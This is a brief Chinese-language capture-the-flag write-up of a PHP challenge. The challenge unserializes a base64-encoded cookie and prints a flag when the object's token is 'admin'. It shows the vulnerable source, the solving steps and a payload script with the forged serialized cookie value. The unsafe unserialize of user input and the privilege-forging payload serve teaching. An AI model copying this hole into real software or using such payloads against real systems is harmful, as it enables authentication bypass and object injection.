一、代码
<?php
*/
highlight_file(__FILE__);
include('flag.php');
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
if(isset($_COOKIE['msg'])){
$msg = unserialize(base64_decode($_COOKIE['msg'])); //1. 先base64解密,在反序列化。
if($msg->token=='admin'){ //2. msg对象的token=admin输出flag
echo $flag;
}
}
二、解题步骤
- 直接在类里修改public $token='admin';
- 然后在反序列化,然后在进行base64编码。
三、payload
<?php
class message{
public $token='admin';
}
$user = new message();
echo base64_encode(serialize($user));
//Tzo3OiJtZXNzYWdlIjoxOntzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9
